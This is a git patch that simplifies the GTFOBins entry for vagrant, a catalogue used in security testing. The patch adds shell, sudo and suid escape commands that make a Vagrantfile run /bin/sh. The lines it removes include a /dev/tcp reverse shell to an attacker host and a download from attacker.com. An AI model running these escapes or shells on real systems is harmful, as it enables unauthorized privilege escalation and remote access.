From f121dff1cc50157a70e5a6bb1d0c2d75a09c1594 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci <cyrus.and@gmail.com>
Date: Thu, 13 Apr 2023 08:34:09 +0200
Subject: [PATCH] Simplify vagrant

---
 _gtfobins/vagrant.md | 38 ++++++++++++++------------------------
 1 file changed, 14 insertions(+), 24 deletions(-)

diff --git a/_gtfobins/vagrant.md b/_gtfobins/vagrant.md
index 95de912..c297c81 100644
--- a/_gtfobins/vagrant.md
+++ b/_gtfobins/vagrant.md
@@ -1,30 +1,20 @@
 ---
-description: |
-Vagrant can execute arbitrary ruby code when starting up. The Commands down below create a new directory "pwn" in the tmp-folder where vagrant then is initialized. After that the command is pasted into the Vagrantfile and executed.
-More Info at https://gtfobins.github.io/gtfobins/ruby/
+description: This allows to execute [`ruby`](/gtfobins/ruby/) code, other functions may apply.
 functions:
   shell:
-    - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "/bin/sh"' > Vagrantfile && vagrant up
-    -
+    - code: |
+        cd $(mktemp -d)
+        echo 'exec "/bin/sh"' > Vagrantfile
+        vagrant up
   sudo:
-    - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "/bin/sh"' > Vagrantfile && sudo vagrant up
-  reverse-shell:
-    - description: |
-        Run `nc -lvnp RPORT` on the attacker box.
-        Replace RHOST and RPORT with the attacker ip and port to gain a reverse shell.
-      code: |
-        mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "sh -i &>/dev/tcp/RHOST/RPORT <&1"' > Vagrantfile && vagrant up
-  file-write:
-    - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'File.open("file_to_write", "w+") { |f| f.write("DATA") }' > Vagrantfile && vagrant up
-  file-read:
-    - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'puts File.read("file_to_read")' > Vagrantfile && vagrant up
-  library-load:
-    - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
-  file-download:
-    - description: Fetch a remote file via HTTP GET request.
-      code: |
-        export URL=http://attacker.com/file_to_get
-        export LFILE=file_to_save
-        mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'require "open-uri"; download = open(ENV["URL"]); IO.copy_stream(download, ENV["LFILE"])' > Vagrantfile && vagrant up
+    - code: |
+        cd $(mktemp -d)
+        echo 'exec "/bin/sh"' > Vagrantfile
+        vagrant up
+  suid:
+    - code: |
+        cd $(mktemp -d)
+        echo 'exec "/bin/sh -p"' > Vagrantfile
+        vagrant up
 ---